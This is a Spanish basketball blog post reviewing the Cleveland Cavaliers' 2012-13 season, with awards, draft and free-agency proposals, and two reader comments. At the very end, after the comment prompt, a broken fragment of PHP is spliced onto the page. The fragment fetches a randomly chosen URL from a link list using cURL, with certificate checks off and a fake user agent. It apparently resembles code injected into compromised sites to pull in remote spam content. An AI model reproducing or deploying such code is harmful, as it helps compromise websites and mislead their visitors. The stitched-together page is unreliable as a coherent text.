Cleveland Cavaliers: Suspenso

26 de June de 2013 por Simon

Esta temporada recién terminada parecía que podía ser la temporada del despegue para los Cavs gracias a un equipo jovencísimo y con talento aunque no exento de defectos y carencias. No creo que mucha gente esperara realmente que los Cavs pudieran meterse en la lucha por los Play Off, pero sí que mejoraran al menos su porcentaje de victorias.

No obstante esta “mala” temporada podría valerles más que si hubieran conseguido más victorias y se hubieran metido en la pomada de los de arriba. Las desgracias son menos desgracias si tenemos en cuenta que a los Cavs conseguir 35 o 25 victorias les da igual, el objetivo era que sus jóvenes crecieran y así ha ocurrido. Irving demuestra cada vez que salta a cancha que es un autentico jugón. Los rookies Waiters y Zeller han dejado en general un buen sabor de boca. El otro joven sobre el que están depositadas muchas esperanzas en Cleveland, Tristan Thompson, ha crecido mucho esta temporada y ha firmado casi un doble doble en puntos y rebotes. Esperanzador sobre todo el paso adelante que dio tras la lesión de Anderson Varejao.  Si a todo este cóctel le sumamos que tienen el nº 1 del Draft 2013, una situación salarial inmejorable y una ciudad ilusionada con el proyecto, vemos que los Cavs andan por el buen camino en su reconstrucción.

Pero centrémonos en lo que ha sido exclusivamente la temporada de los Cavs. Comenzó torcida desde el principio con 11 de 15 partidos jugados fuera de casa con el consiguiente saco de derrotas que eso supone para un equipo como los Cavs. Para colmo de males, Kyrie Irving se rompió un dedo y estuvo fuera de las canchas durante un mes. Al menos Varejao estaba jugando a un nivel altísimo, liderando la liga en rebotes y anotando más que nunca. Tras once partidos de baja Irving volvió y continuó jugando a un gran nivel. Parecía que por fin íbamos a poder comprobar el verdadero potencial de estos Cavs pero apenas 3 o 4 partidos más tarde el ex de Duke se rompió la mandíbula ante los Bucks (aunque no se perdió ningún partido) y un poco más tarde fue Varejao el que caía lesionado ante los Raptors. La lesión del brasileño no parecía revestir en principio una gran importancia y solo iba a dejarlo unos partidos sin jugar pero ante la escasa mejoría presentada con el paso de los días, una nueva prueba desvelaba que Varejao sufría un desgarro y tenía que ser operado. Iban a ser dos meses más de baja. No se sabe si fue antes, después o durante, pero el caso es que poco después de la operación salía a la luz que Varejao entraba a quirófano de nuevo para ser intervenido de un coágulo de sangre en el pulmón. El tratamiento a seguir hacía que su temporada, hasta ahora la mejor de su carrera, finalizara abruptamente. 

Con el año nuevo las victorias por fin parecían llegar. En enero y febrero el equipo logró un 50% de triunfos gracias al buen rendimiento de Tristan Thompson y Dion Waiters. Este último fue elegido, incluso, mejor Rookie del Este del mes de febrero. El mes de Marzo comenzó con una serie de partidos contra equipos de la zona noble y cuando el calendario se suavizaba de nuevo, Irving se volvió a lesionar, esta vez del hombro, y los Cavs perdieron 10 partidos seguidos en parte también por los problemas de rodilla de Waiters que le dejaron sin disputar el último mes de competición tras pasar por el quirófano. De esta modo la temporada de Cleveland acabó realmente en Marzo. Con muchas lesiones y sin nada que disputar lo mejor era asegurarse un buen puesto en el Draft.

PREMIOS

MVP: A pesar de sus continuos problemas de lesiones Kyrie Irving es el alma de este equipo. Ha firmado 22.5 puntos y 6 asistencias de promedio pero su influencia y capacidad de liderazgo y sobre todo de maravillarnos con su inmensa calidad están fuera de toda duda. ¿El problema? En dos temporadas en la liga ha sufrido 3 lesiones importantes y varias de menor gravedad.

Rookie: Tanto Dion Waiters como Tyler Zeller han rendido a un nivel aceptable. Waiters ha jugado una buena temporada que le ha valido para hacerse un hueco en el primer quinteto de rookies del año. Es un anotador fiable aunque ha de mejorar su selección de tiro.  En el caso del pívot su impacto ha sido menor aunque le ha valido para ser incluido en el segundo mejor quinteto de rookies. Su techo no es demasiado alto pero sabe siempre como aportar dentro de sus limitaciones.

Sorpresa: Anderson Varejao. Ya era considerado un jugador más que correcto pero su rendimiento en los 2 meses jugados no deja de ser una de las mayores sorpresas de la temporada. Su nivel hasta la lesión estaba siendo mayúsculo. Muchos rebotes, puntos y, sorprendentemente, un buen número de asistencias, unidas a su ya típico esfuerzo e intensidad defensivo.

Decepción: Ninguna decepción personal. La mayor decepción es que las lesiones les hayan lastrado tanto esta temporada.

JUGANDO A GM

Una de los puestos mas complicados de este verano, el de GM de Cleveland. Nuestros objetivo este verano y para la temporada que viene va a ser mantener la flexibilidad salarial y que los jóvenes sigan creciendo.

  • En el Draft con el 1, nuestra elección finalmente va a ser Nerlens Noel. Es arriesgado pero somos un equipo en reconstrucción y hay que mirar a largo plazo. Noel no nos va a ayudar demasiado en sus primeros años pero su techo es más alto que el de ninguno y  puede crecer a la par con el equipo. Además presumiblemente el año que viene tanto el draft como la agencia libre están cargados de talento… exterior. Este año toca reforzar la pintura.
  • Es difícil saber que nos llegará al pick 19. Una buena opción sería el ruso Sergey Karasev, un buen anotador que reforzaría nuestra posición más floja, la de alero.
  • Al inicio de la segunda ronda, y si aún están disponibles, nuestras elecciones serían Reggie Bullock y Glen Rice JR. Otras opciones son los bases Pierre Jackson o Erick Green.
  • En el capítulo de renovaciones, sólo renovaría a Shaun Livingston que apenas cobrará el mínimo por lo que tampoco supondrá ningún lastre. La QO por Wayne Ellington quizás salga muy cara. Saldría más barato esperar al mercado de AL.

En la agencia libre sería interesante buscar un defensor exterior y un tirador con la intención de completar la plantilla pues no vamos a comprometernos con contratos altos y/o largos por lo que estos serán de un perfil bajo:

  • Anthony Morrow encajaría en este perfil tras su mala temporada que acaba de terminar probablemente aceptaría el mínimo.
  • Nuestra “gran apuesta” va a ser Wes Johnson, si conseguimos llevárnoslo por un contrato que ronde los 3.5 millones por 2 o 3 años lo firmaríamos. Es joven y puede responder a las necesidades de nuestra plantilla siempre y cuando no esperemos nada especial de él.
  • Durante la temporada con Noel ya recuperado buscaríamos una salida para Varejao. Si el equipo no ha mejorado su porcentaje de victorias respecto a otros años, rondas de Draft y jugadores contrastados serían nuestro objetivo.
Comenta

2 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Me gusta el análisis Simón, pero yo no iría a la agencia libre a por esos truños, joder. Parece que lo hace el propio Dan Gilbert, fichando Lukes Waltons de la vida y Livingstones…. son pufos grandes. A ver, si tienes a Varejao y drafteas a Noel, y dices que te falta un alero, coño, no sería lógico proponer un cambio con los Mavericks Varejao x Marion+Crowder o algo así? Pregunto

      Citar

  2. Simon dice:
    #2

    Sancho por la sencilla razón de que creo que Varejao en primer lugar les puede servir más durante la temporada que ahora. En serio que con el nivel mostrado no sería preferible esperar??? Marion + Crowder o gente de ese “pelo” puedes conseguir aunque Varejao no volviera a ser el mismo de antes.y volviera a su versión anterior. ( Recuerda que además existe la posibilidad de ser un expiring lo que unido a su valor deportivo lo hace una bomba a la hora de entrar al mercado )
    Además hice este análisis con la seria intención de no comprometer ni un euro de cara al verano que viene en el que hay una buena terna de AL y un buen draft en el que Cavs tendrá una elección alta con bastante probabilidad y que precisamente ese pick unido a Varejao podría dar con los huesos de una estrella en Cleveland y nos permitiría mantener un buen espacio salarial para dar el salto significativo. ¿ En que ayudaría traspasar a Varejao por medianias ahora? yo creo que en nada. Es más interesante un pack Varejao + pick top 7 por ejemplo que un Varejao a pelo ahora.
    Otra opción que pongo es la de utilizar a Varejao a mitad de temporada si Noel está rindiendo bien y si el equipo tiene opciones de estar peleando por los PO.. Además no descartes que si Varejao vuelve al mismo nivel Cavs pudiera hacer valer su team option y aguantarlo un año más pq el nivel al que estaba 9 Millones parecen pocos…
    Coincido en que esos jugadores que propongo son un truño. Pero precisamente pensar en esos jugadores es por el tema económico. Son jugadores jóvenes ( y con cierto talento ) que en un rol muy determinado podrían servir para ayudar mucho en un futuro cuando el equipo aspirara a entrar en PO… y si no te sirven de nada pues sus contratos bajos y cortos no te van a comprometer nada de cara al verano que viene.
    Es una idea muy conservadora si, y de hecho “fantasear” y jugar a GM es algo divertido y creeme hice como 4 o 5 ideas distintas para este apartado y al final me decanté por la mas plausible y ajustada a la realidad, que Cavs se mantenga a la espectativa de cara al verano que viene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>